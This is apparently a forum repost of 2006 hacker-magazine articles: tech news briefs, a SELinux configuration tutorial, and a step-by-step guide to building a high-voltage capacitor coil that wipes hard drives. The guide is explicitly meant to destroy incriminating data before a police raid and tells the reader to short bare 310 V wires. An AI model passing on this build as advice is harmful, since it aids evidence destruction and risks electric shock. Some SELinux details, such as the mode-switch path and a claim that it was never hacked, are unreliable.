авиации.

][News_Jul2k6

mindw0rk@gameland.ru

[Microsoft делится секретами с хакерами]

Можешь ли ты представить ситуацию, когда дяди из Microsoft сами приходит к хакерам и рассказывают о тонкостях защиты винды? Мне как-то слабо представляется. А вот сами дяди из Microsoft ничего зазорного в этом не видят, поэтому решили принять участие в хакерской конференции Black Hat, которая состоится уже скоро. Причем не просто поучаствовать, а прочитать несколько докладов о методах защиты грядущей Висты, разных функциональных особенностях и тому подобных вещах. Всего за один день спецы из Microsoft планируют сделать 5 презентаций, одна другой откровеннее. Так что злохакеры, попавшие на Black Hat, смогут узнать о защитных механизмах новой ОС задолго до ее выхода и заранее разработать свои злотехники взлома. «Каков мотив столь странного поведения?» - спросишь ты. По словам представителей Microsoft, такой шаг вызван политикой компании, которую можно изложить в двух словах: «Наша система безопаснее всех!». И реальную степень этой самой безопасности они предлагают определить независимым специалистам, то есть хакерам.

[Три года за карикатуру Христа]

Веб-блоги за последние несколько лет стали не просто одним из интернет-комьюнити, а настоящей сетевой болезнью, которой заражены миллионы людей. Каждый теперь считает себя просто обязанным поделиться своими мыслями и наблюдениями с остальными, причем мысли эти могут быть о чем угодно. Но если в нашей стране каждый может в своих дневниках безнаказанно обсирать правительство или, к примеру, звезд эстрад, то жителям Сингапура теперь приходится следить за своим языком. Недавно там арестовали автора одного из блогов, который выложил у себя карикатуру Иисуса Христа в виде зомби и подписал: «Почему мой Мессия пытается съесть мой мозг? На третий день Иисус восстал из могилы». Соцнадзор шутку не оценил и сначала попросил убрать провокацию по-хорошему, а когда сингапурский графоман не повиновался, выслали ему повестку в суд. Причем штрафом за хулиганство чувак может и не отделаться – максимальное наказание составит 3 года тюрьмы. Это, кстати, не первый подобный случай: в прошлом году в этой стране посадили за решетку двух китайцев, сетевые писульки которых разгневали сингапурских мусульман. Причем так, что азиаты сидят и по сей день. Интересно, что бы подумала сингапурская полиция нравов про авторов кружка «Веселый богохульник»: http://community.livejournal.com/ru_blasphemy

[Под колпаком у АНБ]

Не секрет, что Агентство национальной безопасности США владеет большой базой данных по американским жителям и не только. Телефоны, адреса, номера социального страхования, судимости и даже особые приметы. Но АНБ этого показалось мало, и парни решили расширить свою сокровищницу. А как это лучше всего сделать? Правильно, обратиться к интернету. Ведь народ в сети на каждом углу оставляет о себе разные полезные сведения. Чего стоят только сайты знакомств и веб-блоги. Конечно, если вручную фильтровать все это добро – никакого здоровья не хватит, поэтому сейчас Агентство занимается разработкой технологии быстрого сбора данных по заданным критериям. Мораль сей басни такова: смотри, что пишешь, — Большой Брат не дремлет.

[Кардерский приговор]

В кардерском мире есть люди, которые воруют помаленьку, и не привлекают к себе особого внимания, а есть такие, что гребут лопатами, и рано или поздно оказываются в коморке 3x3. Именно ко второй категории относится банда одессита Артура Ляшенко, которая почти три года терроризировала бедных буржуев. Основной их деятельностью было производство и сбыт фальшивых кредиток, а добыванием инфы о номерах реальных счетов занимались отдельные люди. Любой желающий мог купить у них карточку с минимальным количеством денег за 100-150$, клиенты посерьезнее брали кредитки с многозначными суммами за 40-50%. У кардеров даже был свой сайт, откуда они сбывали основную часть поддельных кред. К поимке Ляшенко и Co. подключились как МВД, так и спецслужбы (Интерпол, ФБР), ведь ущерб от их работы оценивался уже в районе 90 миллионов долларов. Как их поймали – тема отдельной статьи. Скажу только, что при задержании банды на их штаб-квартире нашли более 80-ти тысяч карт на миллионы баксов. На днях московский суд вынес парням приговор: главаря Ляшенко приговорили к 6-ти годам общего режима, а остальным членов группы – от 5 лет условно до 5 лет за решеткой.

[Операция Мозар]

В прошлом месяце в Великобритании прошла антитеррористическая операция Мозар, в результате которой были арестованы 30 человек. Началось все с того, что британские спецслужбы установили электронное наблюдение за несколькими людьми, подозревавшимися в связях с террористами. Полиция перехватила сетевую переписку и блокировала каналы, по которым она шла. Из полученной инфы стало ясно, что чуваки задумали недоброе, а именно: взорвать здание парламента в Оттаве. Всплывшее имя Абу Мусаба аль-Заркави, лидера подпольной террористической группы в Ираке, стало тому подтверждением. Спецслужбы арестовали сначала 17 человек, участвовавших в переписке, а через них вышли на остальных. Большинство задержанных оказались людьми, завербованными террористами через интернет. Бородатые слуги Аллаха уже давно используют передовые технологии для пополнения своей армии. Так что если тебе в мыло попадет письмо от какого-нибудь Моххамеда бин Ладена, то лучше его сразу удали - от греха подальше
[La Martiniere против Google]

Google продолжает трудиться на благо народа, но при этом все равно находятся злые люди, которые не ценят усилий компании. Мало того, подают на любимца народа в суд. Как, например, La Martiniere – французское издательство, обвинившее Google в нарушении авторских прав. Как ты уже, наверное, знаешь, одно из отделений поисковой компании занимается оцифровкой книг нескольких крупнейших библиотек мира. Но по закону это можно делать только с разрешения издательств, а Google не спрашивает разрешения. До недавнего времени проект книжной оцифровки вызывал лишь критику у таких организаций, как Association of American University Presses, но теперь Гуглу так просто не отделаться. Компания делает упор на старые оцифрованные книги (авторов уже давно нет в живых, да и не ради прибыли это делается, а чтобы сохранить знания потомкам). Но посмотрим, что скажет суд.

[Microsoft перевоспитала спамера]

«Теперь могу сказать наверняка: я прозрел! Понял, что спам — это зло, и с ним нужно бороться. А ведь еще недавно я относился к нему, как к игре в кошки-мышки. Но общение с господином прокурором, товарищем следователем и мистером судьей показали мне всю неправоту моих прежних мыслей. Да, друзья мои, я записался в добровольцы антиспамерского движения. Скажем решительное «НЕТ» спаму! Смерть спамерскому захватчику!» - текст примерно такого содержания опубликовал недавно в своем веб-блоге 24-летний техасец Райан Питиляк, по мнению экспертов, один из 5 самых активных спамеров мира. На пике своей карьеры Райан рассылал до 25 миллионов писем в день! Что же послужило причиной озарения? Все просто, война Microsoft против спама привела к аресту этого молодого человека, и, чтобы избежать долгих лет за решеткой, Питиляк подписал с компанией мирное соглашение, стоившее ему миллион баксов. Но это не уберегло его от общения с доблестной полицией штата, а там таких прохиндеев, что и говорить, не любят. Теперь бывший спамер считает себя «антиспамером-активистом» и обещает приложить все усилие в борьбе с такими, как некогда он был сам.

[Китай под флагом Linux]

В конце 2005-го года китайское правительство объявило, что планирует сократить на четверть закупаемый софт от Microsoft. В июне этого года китайцы подошли к вопросу кардинально. Страна восходящего солнца решила полностью отказаться от услуг дяди Билла, и все китайские компьютеры оснастить ОС Linux. По крайней мере, те, которые стоят в правительственных и госучреждениях. «Этя глябальная тиндесия. Линукся дешевый, степень ево адаптасии тожи высокий, однако», - прокомментировал решение верхов Майк Лин, консультант компании Taipei Computer Association. А Майкрософт осталось только развести руками: «Покупатели вольны сами выбирать, что им нужно». Тем не менее, с правительством Китая согласны далеко не все. Например, крупнейший производитель ПК в этой стране, компания Lenovo, планирует и дальше сотрудничать с Microsoft, устанавливая винду на все выпущенные компьютеры. Эксперты предрекают, что, если Lenovo будет гнуть свою линию, ее конкуренты Dell и HP отберут часть рынка, а значит, лишат компанию прибыли. К тому же неизвестно, как к этому отнесется президент Китая вместе с министрами, – представители этого народа известны своими кардинальными мерами к «смутьянам правильного режима». Кстати, на русских секурити-форумах наши спецы вовсю поддерживают китайцев и выражают сожаление, что такого поворота пока не произошло в России.

[Доменный беспредел]

Сложная ситуация возникла вокруг российского хостинг-провайдера Majordomo и крупнейшего американского регистратора доменов GoDaddy. В середине июня годэдди блокировала домены клиентов мажордомо, мотивируя это жалобами на спам с этих адресов. Автором недовольства была компания Spamhouse, занимающаяся ведением черного списка спамерских адресов. Получив письмо от спамхауза, деддики долго разбираться не стали, а просто отключили домены. Majordomo это, конечно, не понравилось, тем более что никаких доказательств рассылки спама от них нет. Имена «плохих» клиентов, которые назвал регистратор, по словам хостера, к нему отношения не имеют – один еще в прошлом году прервал сотрудничество, другой – вообще является сторонней компанией. Получается, что GoDaddy, не проверив инфу, ввела такие кардинальные меры. Итогом переписки между двумя организациями стало предложение от регистратора заплатить по $199 за восстановление каждого отключенного домена или по $55 за переход к другому регистратору. Конечно, Majordomo может подать в суд, но есть мнение, что от этого не выиграет никто: GoDaddy – буржуйская контора и является чем-то вроде Майкрософта в своем деле. Чем все закончится, не известно, а пока блокированные домены имеют длинную приставку: SUSPENDED-FOR.SPAM-AND-ABUSE.COM.




Автор: Metallica Nov 19 2006, 11:52

Тотальный контроль над пингвиномSELinux: максимальная защита

Сегодня мы поговорим о SELinux - одной из самых популярных систем управления доступом. Помимо SELinux существуют еще GrSecurity и LIDS, но самой строгой из них является именно SELinux. Благодаря правильной настройке эта система ни разу не была взломана. Так как объем публикации не позволяет полностью описать SELinux, мы остановимся только на основных понятиях и концепциях этой системы. Большая часть статьи будет уделена практической настройке, а, если ты что-то недопонял из теории, во врезке ты найдешь список дополнительных ресурсов.

Зачем это надо?

Linux при правильной настройке считается одной из самых защищенных операционных систем мира. Так зачем нужна дополнительная система управления доступом? Неужели не хватает возможностей самой Linux? Да, не хватает. В Linux есть два типа пользователей: обычный пользователь и администратор (root). Права обычных пользователей можно ограничить и с помощью штатных средств Linux. Но что находится во власти администратора, ты и сам знаешь. Если злоумышленник завладеет паролем администратора (как он это сделает - это уже другой вопрос), то он получит полную власть над системой. Но если на компьютере установлена система управления доступом, то она не позволит ему сделать ничего криминального. Злоумышленник просто не сможет причинить ощутимый вред скомпрометированному хосту. Система управления доступом может ограничить даже действия самого пользователя root, если таковые действия могут стать причиной некорректной работы системы (например, угрожать целостности данных, работе самой системы и т.д.).

Вернемся к обычным пользователям. Здесь можно задавать ограничение на доступ к определенным файлам и на использование системных ресурсов - дискового пространства (квоты), процессорного времени, устанавливать максимальное число процессов — и все. Система управления доступом может запретить пользователю выполнять те действия, которые он не должен выполнять. Во многих случаях даже обычным пользователям часто предоставляются чрезмерные полномочия. Например, зачем пользователю, который зарегистрировался в системе только для чтения почты, предоставлять возможность компиляции исходного кода или запуска фоновых демонов? Теперь все становится на свои места: мы понимаем, что без SELinux в настоящей многопользовательской системе не обойтись. Справедливости ради стоит отметить, что описанные выше фичи также можно организовать, используя GrSecurity или LIDS.

Кроме всего прочего, SELinux контролирует и права доступа к файлам. Например, система проверила права доступа файла и разрешила к нему доступ. Но потом принимается за работу SELinux. Если в настройках SELinux указано, что данный пользователь (или процесс) не имеет доступа к файлу, тогда уже SELinux запрещает к нему доступ. И в самом деле, зачем Web-серверу обращаться к каталогу /etc/selinux? Если же система запретила доступ к файлу (это первый этап - проверка прав доступа), тогда SELinux не задействуется.

Как устанавливать SELinux?

Давай упростим друг другу жизнь и не будем рассматривать установку этой системы на «голый» Linux. SELinux входит в состав Fedora Core (кстати, FC стал первым дистрибутивом, в состав которого была включена SELinux) и дистрибутивов, основанных на нем. Настройку SELinux будем рассматривать на примере ASP Linux 11 - самого свежего SELinux-дистрибутива, который имеется под рукой.

Перейди в каталог /etc/selinux. Здесь ты найдешь файл config, управляющий настройками самой SELinux, а также каталог targeted, в котором будут находиться конфигурационные файлы политики targeted. В нем будут три подкаталога: contexts, policy, users (контексты, политика, пользователи), а также файл booleans, в котором установлены некоторые булевые (логические) параметры. Вообще, этот файл руками трогать не нужно - посмотрели и забыли. Во всяком случае, на данном этапе. Итак, что же находится в каталогах contexts, policy и users? Чтобы получить ответ на этот вопрос, нужно обратиться к скучной теории.

Скучная теория

Начнем с базового понятия - понятия сущности. Сущность (identity) формирует часть контекста безопасности, задающего домены, в которые можно войти. То есть сущность определяет, что можно сделать. Не нужно путать сущность с идентификатором пользователя (UID). Они параллельно существуют в системе, но их смысл абсолютно разный. Обычно сущность представляется в системе так же, как и имя пользователя. Если в системе есть пользователь den и есть сущность den, выполнение команды su не изменяет сущности SELinux. Предположим, у нас есть пользователь den. Зарегистрируемся под ним и выполним команду id (это команда SELinux). Вывод:

context=den:user_r:user_t

Теперь введем команду su, наберем пароль root и снова введем команду id:

context=den:user_r:user_t

Мы получили тот же самый вывод. Как видишь, контекст остался прежним и не изменился на контекст пользователя root. Правда, есть одно «но». Если сущности den разрешен доступ к роли sysadm_r (сейчас роль — user_r) и пользователь выполнит команду «newrole -r sysadm_r» (изменить свою роль), а потом снова наберет id, то получит вывод:

context=den:sysadm_r:sysadm_t

Сущность осталось такой же, но роль и домен (второе и третье поле) изменились. Сущность определяет, какие роли и домены могут быть использованы.

Домен (domain) предоставляет список операций, которые может выполнить процесс по разным типам, точно определяет его привилегии. Примеры доменов: sysadm_t - домен администратора системы, user_t - домен для непривилегированных пользователей. Процесс init выполняется в домене init_t, а named - в named_t.

Тип (type) задается для объекта и определяет доступ к этому объекту. Тип - это то же самое, что и домен, но если домен относится к процессам, то тип - к файлам, каталогам, сокетам и т.п.

Роль (role) определяет список доменов, которые могут быть использованы. Домены, разрешенные для пользовательской роли, определяются в файлах политики. Если у роли нет доступа к домену, то при попытке выполнения действия с доменом, доступ будет запрещен. Лучше всего это продемонстрировать на примере: если тебе нужно разрешить непривилегированным пользователям (домен user_t) выполнить команду passwd, то в конфигурационном файле нужно прописать:

role user_r types user_passwd_t

Из команды видно, что пользователь с ролью user_r может входить в домен user_passwd_t, то есть может выполнить команду passwd.

Контекст безопасности (security context) - это набор всех атрибутов, которые связаны с файлами, каталогами, процессами, TCP-сокетами. Контекст безопасности состоит из сущности, роли, домена (или типа вместо домена). Команда id выводит текущий контекст безопасности.

Решение о переходе (transition) определяется контекстом безопасности, который будет назначен выполняемой операцией. Существует два вида переходов:

* переход домена процесса - используется при выполнении процесса определенного типа

* переход типа файла - используется при создании файла в определенных каталогах

Наконец, рассмотрим понятие «политики». Политика - это набор правил, контролирующих списки ролей, к которым у пользователя есть доступ, доступ ролей к доменам, доступ доменов к типам.

Ты точно разобрался с доменами/типами/ролями? Смотри, например, выражение «доступ ролей к доменам» означает, какие пользователи имеют право запускать те или иные процессы. А выражение «доступ доменов к типу» - какие процессы имеют право доступа к тем или иным объектам (файлам, каталогам, сокетам). Редактируя файлы политики, ты можешь настроить свою систему так, как пожелаешь.

Первоначальная настройка SELinux

Зарегистрируйся в системе как пользователь root и введи команду:

# system-config-securitylevel

В окне «Настройка уровня безопасности» перейди в закладку «Настройка SELinux». По умолчанию SELinux обычно выключена. Для ее включения установи флажок «Включено». Сразу после этого ты увидишь предупреждение о необходимости перемаркировать файловую систему правильными контекстами безопасности. В этом же окне сообщается, что перемаркировка ( она будет выполнена после перезагрузки системы, кстати, это — аналог команды «make relabel») может занять довольно много времени (зависит от размера файловой системы).

После этого обрати внимание на окно «Настройка SELinux». В нем можно выбрать тип политики. Пока доступна только одна политика - targeted (целевая).

Теперь нажми кнопку «OK» и перезагрузи компьютер командой «reboot». В процессе старта системы появится сообщение:

Warning -- SELinux relabel is required ***

Что свидетельствует о том, что SELinux будет перемаркировывать файловую систему. После этого пойдет привычная для тебя загрузка. Однако при входе в X Window на первую консоль будет выведено несколько не совсем обычных сообщений. Здесь ничего страшного нет — их формат мы разберем чуть позже. Первое, что хочется сделать, - это ввести команду id, чтобы просмотреть свой контекст безопасности:

context=root:system_r:hotplug_t

Роль system_r - это роль системы, которая выше роли sysadm_r.

Теперь самое время обратиться к конфигурационным файлам SELinux. Открой файл /etc/selinux/config. В нем будут всего две директивы: SELINUX и SELINUXTYPE. Первая может принимать следующие значения:

* enforcing - применить политику безопасности SELinux

* permissive - режим отладки (вместо запрета тех или иных операций SELinux будет просто выводить предупреждения)

* disabled - SELinux отключена

Для второй директивы возможны два значения:

* targeted - будут защищены только целевые сетевые демоны (которые будут явно указаны)

* strict - полная защита

Если тебе нужна полная защита, установи пакет selinux-policy-strict. Данный пакет находится на первом CD ASPLinux 11. Со второго компакта я бы посоветовал установить пакет selinux-doc. Дополнительная документация никогда не помешает.

Для аудита политик SELinux используется программа seaudit, но при запуске мы получаем сообщение, что не установлена политика по умолчанию. Интересно то, что на дистрибутивных дисках я так и не нашел пакет policy, содержащий эту дефолтную политику. Пришлось качнуть его из интернета: ftp://rpmfind.net/linux/ASPLinux/i386/RPMS.10/policy-1.11.3-3.noarch.rpm.

Выбор роли

Роль имеет большое значение, ведь у каждой роли свои полномочия. Например, sysadm_r полномочий намного больше, чем у user_r, поэтому нужно знать, как можно изменить роль. Хотя, с другой стороны, у targeted, в которой мы сейчас работаем, роли пользователей особого интереса не представляют, поскольку осуществляется защита только выбранных сетевых демонов. Но о команде newrole сказать все-таки нужно. Ее синтаксис следующий: «newrole -r роль». Например:

# newrole -r sysadm_r

После этого нужно будет ввести пароль для сущности (пароль пользователя). Если нет прав доступа к указанной роли, ты увидишь сообщение:

den:sysadm_r:sysadm_t is not a valid context

В этом случае указывается, что сущность den не имеет права доступа к роли sysadm_r.

Псевдофайловая система /selinux

При запуске системы с поддержкой SELinux в корне появится каталог /selinux - это псевдофайловая система SELinux (наподобие /proc). С помощью этой ФС можно изменять некоторые параметры SELinux, например режим работы. Как уже было отмечено, есть два режима работы: разрешающий (permissive) и принудительный (enforcing). В первом режиме SELinux только ругается, и ОС работает так же, как и обычная Linux-система, без SELinux, а во втором случае применяются все настроенные политики. Отладочные сообщения в разрешающем режиме протоколируются в файл /var/log/messages. Для переключения в принудительный режим используется команда:

# echo "1" > /etc/selinux/enforce

Для перехода в разрешающий режим используется команда:

# echo "0" > /etc/selinux/enforce

Разборки с пользователями

Лучше добавить всех необходимых пользователей в систему до включения SELinux, но бывают такие случаи, когда сделать это просто невозможно (например, система работает продолжительное время, и все пользователи давно заведены). Если SELinux уже активна, то для добавления нового пользователя нужно выполнить следующий набор команд.

Становимся администратором:

$ su

Входим в роль sysadm_r:

# newrole -r sysadm_r

Добавляем нового пользователя:

# useradd -c "New user" -m -d /home/newuser -g users \

-s /bin/bash -u 1005 newuser

# passwd newuser

Но этого мало. Также требуется настроить роли пользователя. Для этого в файл /etc/selinux/users добавляем строку:

user newuser roles { user_r };

Таким образом мы назначаем пользователю newuser роль user_r. Если тебе нужно, чтобы пользователь имел доступ к нескольким ролям — тогда укажи несколько ролей через пробел, например:

user setest roles { user_r sysadm_r };

Для активации изменений введи команду:

# make -C /etc/selinux load

По окончании этой операции ты увидишь такие сообщения:

Success

touch tmp/load

make: Leaving directory `/usr/share/selinux/policy/current'

Нужно отметить, что если пользователю нужен доступ только к роли user_r, то это можно даже не указывать. Явное указание необходимо лишь в случае, когда пользователю требуется изменить свой пароль самостоятельно.

Влезаем в политику

Теперь начинается самое интересное. Мы будем редактировать нашу политику. Сейчас у нас используется политика targeted, подразумевающая защиту только указанных тобой сетевых демонов. Запусти конфигуратор system-config-securitylevel. На закладке SELinux появится возможность редактирования политики. Там все просто: приводится список служб и для каждой службы набор опций SELinux. Например, вот список опций для FTP:

* выключить защиту SELinux для демона ftpd;

* выключить защиту SELinux для демона initd;

* разрешить ftp читать/записывать файлы в домашних каталогах.

А вот список привилегий пользователя:

* позволить пользователям читать любые файлы по умолчанию;

* разрешить пользователям запускать pppd-соединения.

Читаем сообщения SELinux

Рассмотрим пример типичного ругательства SELinux, которое можно обнаружить в /var/log/messages:

May 21 14:44:12 localhost kernel: audit (1148208252.610:29): avc: denied { read } for pid=2054 comm="bash" name=".bash_profile" dev=hda6 ino=23695 scontext=root:system_r:hotplug_t tcontext=root:object_r:user_home_t tclass=file

Строка «avc: denied» означает, что операция была запрещена. Далее следует идентификатор процесса, пытающегося выполнить операцию (for pid), имя процесса (comm), имя объекта (name), имя устройства (dev), номер инода объекта (ino), контекст безопасности процесса (scontext), контекст безопасности объекта (tcontext) - в данном случае это файл «.bash_profile» и тип целевого объекта (tclass=file - тип объекта - файл).

INFO

В UNIX может использоваться одна из следующих моделей доступа:

* дискретное управление доступом (Discretionary Access Control, DAC);

* принудительное управление доступом (Mandatory Access Control, MAC);

* модель тип-домен (Domain Type Enforcement, DTE).

WIKIPEDIA

SELinux (от англ. Security-Enhanced Linux — Линукс с улучшенной безопасностью) — это специальная версия ядра Линукс и программ, которые обеспечивают поддержку принудительного контроля доступа, базирущегося на принципе наименьших прав. Это не дистрибутив Linux, а набор изменений, которые могут быть применены к операционным системам на базе ядра Linux и некоторым не-Linux системам, таким как BSD.
WWW

Не стоит расценивать эту статью как исчерпывающее руководство по системе SELinux, поскольку мы не рассмотрели даже и половины ее возможностей. Вот что еще можно почитать:

* gazette.lrn.ru/rus/articles/intro_selinux.html - введение в SELinux;

* www.nsa.gov/selinux/faq.html - FAQ от NSA (на английском, но прочитать нужно обязательно!);

* dkws.org.ua/index.php?page=show&file=a/hacker/-hacker - мои статьи по LIDS и GrSecurity




Автор: Metallica Nov 19 2006, 13:58

Убийца жестких дисков


Собираем магнитный уничтожитель данных

Ты наверняка слышал множество баек об устройствах для мгновенного уничтожения данных, хранящихся на жестких дисках. Якобы есть такая пушка, которую наводишь в сторону компьютера, нажимаешь на курок, и после этого мощный импульс электромагнитного поля стирает все данные с жесткого диска, попутно выжигая всю электронику в радиусе 10-ти метров. Согласись, любопытная штука. Недавно мы решили проверить на практике, насколько вообще возможно уничтожать данные магнитным полем, и смастерили настоящего монстра: убийцу жестких дисков.

Вообще, идея такого девайса зрела у меня в голове очень давно: еще когда мы делали статью о восстановлении данных, я разговорился с ребятами в R.Lab и они рассказали, что у них есть возможность достать девайс, мгновенно выжигающий всю информацию с хардов. Мне, естественно, сразу захотелось достать это устройство, провести с ним ряд экспериментов и написать для тебя статью.

Зачем это нам?

Согласись, чрезвычайно любопытно: возможно ли испортить жесткий диск магнитным полем, созданным в домашних условиях? Сложно ли это сделать? Насколько сильными будут повреждения? Возможно ли будет восстановить хоть часть инфы с поврежденного жесткого диска? Развернутые ответы на все эти вопросы ты получишь в этой статье.

Вторая вещь, которая подогревала наш энтузиазм, заключается в практическом интересе. У тебя, как и у всех крутых хакеров, я уверен, на жестком диске находится масса очень важной и интересной для тебя информации: зловредные сплоиты, дампы вкусных баз данных, занимательные логи icq и так далее. Согласись, очень не хочется отдавать всю эту информацию отряду ОМОН, который по недоразумению вышиб дверь в твоей квартире smile.gif. Времени, сам понимаешь, в такой ситуации очень немного: поэтому все программные клинеры идут лесом. Нам срочно нужно спаять устройство, которое за пару наносекунд не оставит ни бита ценной информации на твоем винчестере.

Поехали

Достать убийцу hdd у ребят в R.Lab не получилось, и я подумал, что это даже к лучшему: куда круче самостоятельно сделать такую штуку smile.gif. Через несколько дней я познакомился с настоящим техно-маньяком Серегой (dlinyj), и мы договорились, что он сделает девайс и напишет об этом в журнале. В один из жарких летних вечеров мы встретились у метро и поехали в его логово. Надо сказать, квартирка у него колоритная. В комнате, где он работает, все засыпано блоками питания, старыми материнскими платами, конденсаторами, самодельными колонками, ламповыми усилителями, разными фрикерскими девайсами и просто отборным мусором. Но, видимо, именно такая обстановка сделала этого парня самим собой: паяет он отлично, быстро соображает и каждую секунду придумывает по 2-3 новые схемы лампового усилка.

На этом я (nikitozz) заканчиваю введение и отдаю тебя в руки техноманьяка Сереги. Сейчас он тебе расскажет, как мы убивали винчестеры.

Детали gauss gun

Идея девайса очень простая: винчестер помещается в катушку индуктивности (спираль из медной проволоки с большим числов витков), на которую разряжается конденсатор большой емкости. Как тебе известно из школьных уроков физики, электрический ток, проходя по катушке, создает магнитное поле, которое и будет стирать инфу с харда. Чем больше напряжение заряда, емкость конденсатора и число витков у катушки, тем сильнее магнитное поле и больше вероятность того, что мы убьем жестких диск.

Я говорил о конденсаторе в единственном числе — на практике же мы будем использовать целую батарею конденсаторов. Я заюзал электролитические конденсаторы и сетевое напряжение 220 вольт (которое после выпрямления достигает 310 В). Был взят обычный компьютерный БП, в котором уже есть выпрямитель и кондеры. Подойдет для этих целей даже горелый БП, главное, чтобы работал выпрямительный диодный мост и были живыми кондеры.

Что касается дросселя, то для его изготовления подойдет любой медный кабель достаточной длины (метров 20-30 хорошо бы!).

Модификация БП

Начнем с самого интересного — с модификации блока питания. В компьютерном БП, как и во многих импульсных источниках питания, выпрямительные конденсаторы подключаются параллельно со специальными резисторами, которые называются «шунтирующими». Это делается для того, чтобы при отключении питания конденсаторы сами быстренько разрядились. Нам как раз нужно, чтобы конденсаторы при отключении питания не разряжались на резисторы, а зяряд хранился. Эти резисторы нужно откусить кусачками или выпаять (см. фотографии). Обрати внимание, что после выпрямителя напряжение составляет 310 вольт, а электролитные кондеры рассчитаны обычно на 200. Почему же они не взрываются? Дело в том, что они включены последовательно, а значит, на каждый конденсатор приходится по 155 вольт. Но суммарная емкость этих конденсаторов будет вполовину меньше написанной на корпусе (из-за их последовательного соединения).

Если БП был рабочим, необходимо перерезать все дорожки, ведущие к основной схеме БП. В моем случае блок был горелым, и это было не актуально.

На плате БП смонтирована пара здоровых конденсаторов – два самых больших цилиндрика. С одной стороны на пару подается «-», с другой — «+». Сами конденсаторы между собой соединяются как батарейки в плеере, минус к плюсу. Знать это нам нужно, чтобы наращивать емкость конденсаторов. Как показала практика, стандартных конденсаторов блока питания вполне хватает для стирания винта, но мы, для верности, подпаяем к ним еще пару кислотных кондеров, взятых из старой советской техники. Надо знать, что минус у таких конденсаторов находится «под гайкой», то есть на корпусе. Плюс — на центральном контакте. Соответственно, нужно припаять минус конденсатора в блоке питания к плюсу внешнего кондера — его центральному контакту. Это, опять же, видно на наших фотографиях.

Модифицированный таким образом блок питания можно уже использовать для уничтожения информации. Поэтому мы готовы провести первый опыт.

Первый опыт

Для первого опыта я взял обмоточный провод с сечением 1 мм и просто намотал его на винт. Получилось порядка 200-300 витков. Затем я протестировал винт (для этого опыта был взят Maxtor 80 gb с кучей бэдов, котоырй ценности не представлял). Я убедился в том, что он определяется в биосе и подпаял один конец катушки к «+» конденсаторной батареи блока питания; к другому концу дросселя я припаял проводок, конец которого покрыл тонким слоем припоя. К минусу нашего блока питания я припаял второй проводок. Эти два провода служили мне «кнопкой» - для разрядки конденсаторов на катушку достаточно просто соединить их. Почему я не заюзал культурную кнопку или тумблер? Дело в том, что обычная кнопка, рассчитанная на напряжение меньше 400 вольт, просто выйдет из строя при попытке использования: контакты крепко приварятся друг к другу smile.gif. Подходящей кнопки под рукой не было, и я решил обойтись просто замыканием двух голых проводов

Переходим к самой любопытной части опыта. Блок питания я закрыл крышкой, чтобы, если конденсаторы вдруг взорвутся, остаться целым. БП я подключил через сетевой фильтр - его легко отключить. Включив питание и подождав несколько секунд, я отключил блок питания от сети и замкнул два описанных выше провода. Произошел мощный хлопок, и меня ослепила яркая вспышка. В это же самое время по намотанной на винчестер катушке пробежал очень большой ток, который создал сильное магнитное поле внутри дросселя. Этот мощный импульс хаотично переориентировал магнитные домены в информационном слое и напрочь убил хард, уничтожив всю информацию на нем.

Проверив хард, я убедился в том, что он не определяется в БИОСе и вышел из строя. Это, в общем-то, логично: системная информация хранится на блинах и теперь она затерта. Однако меня не покидала следующая мысль: я не снял контроллер с винта, и магнитное поле могло просто убить всю электронику. Поэтому пришлось провести второй опыт: я взял древний 500 Мб Seagate, увеличил емкость конденсаторной батареи и повторил все действия. Опять хлопок, вспышка и приятное ощущение, когда винчестер не определился в биосе smile.gif.

Это были вводные эксперименты. Сейчас настало время сделать полноценный хакерский девайс, который можно стационарно установить в компьютер и который, при жесткой необходимости, убьет напрочь твой хард.

Крутой девайс

Для создания нашего мегадевайса нам потребуется: корпус от съемных хардов( mobile rack или любой другой корпус, устанавливаемый в 5” отсек), пластмассовая коробочка от жестких дисков, 5 метров витой пары, горелый БП и корпус от него, несколько электролитических конденсаторов, рабочий БП и сам комп с хардом.

Для начала кладем винт в коробочку, и отрезаем торец этой коробочки, чтобы можно было подключить питание и шлейф. Затем обрезаем торчащие элементы, чтобы он хорошо и свободно помещался в 5” корпус.

После этого нужно подготовить провод. Удобно это делать в длинном коридоре, где его можно вытянуть на всю длину. Сначала снимаем внешнюю изоляцию кабеля и достаем оттуда 4 витых пары. Дальше - интереснее. Теперь надо каждую витую пару развить. Один конец пары вставляем в реверсивную дрель, другой конец можно отдать приятелю. Далее включаем дрель и разматываем (против часовой стрелки!) витую пару. Делать это надо аккуратно и внимательно; у нас на этот процесс ушел где-то час. Удобно делать втроем. Один держит дрель, второй — противоположный конец, а третий следит за размоткой и помогает развиться паре. После того как ты размотал витуху, у тебя будет 8 проводов — каждый по 5 метров длиной. Зачисли их концы и скрути в один 40-метровый кабель, обязательно заизолировав места скрутки.

Наматываем 40 метров

После этого, виток к витку, наматываем провод на коробку, внутри которой лежит винчестер. Когда весь кабель будет намотан на винчестер, нужно уложить его в 5-дюймовый бокс таким образом, чтобы он туда хорошо поместился, и ничего не торчало. Из бокса выводим IDE-шлейф, кабель питания и два конца обмотки для подключения к конденсаторам.

Теперь займемся блоком выпрямителя и батареей конденсаторов. Удобно все это добро разместить в корпусе от блока питания. Для этих целей я взял кусок от платы сгоревшего БП, оставив только блок выпрямителей и конденсаторы. В старых совковых теликах конденсаторы монтировались на шасси, под гайку. Само шасси было «-», а центральный электрод — «+». Учитывай это. Спаиваем вместе все конденсаторы, строго соблюдая полярность. Я оставил кусок шасси, и просто подпаял к нему «-». Далее закрепляем все это дело в корпусе от БП. Оставшийся кусок платы я поставил на штатные места, предварительно подпаяв два провода на «+» и «-», заведя их на конденсаторы и провода питания, которые пойдут в сеть 220 вольт. Блок совковых конденсаторов нельзя просто так бросить в корпус БП - тогда на корпусе будет нефиговый потенциал, и тебя просто дернет крепко током. Так что при закреплении их в металлическом корпусе необходимо изолировать их от стенок — обмотай их изолентой.

Далее из корпуса выводим две пары проводов: одна пара - сетевые провода на 220 вольт, вторая пара - на дроссель жесткого диска. Аккуратно закрываем конденсаторно-выпрямительный блок, следя за тем, чтобы кондеры и разные контакты не касались корпуса. Лучше все оголенные провода заизолировать, а то лужа расплавленного металла на полу, которая когда-то была твоим компом, вряд ли кого-то обрадует smile.gif.

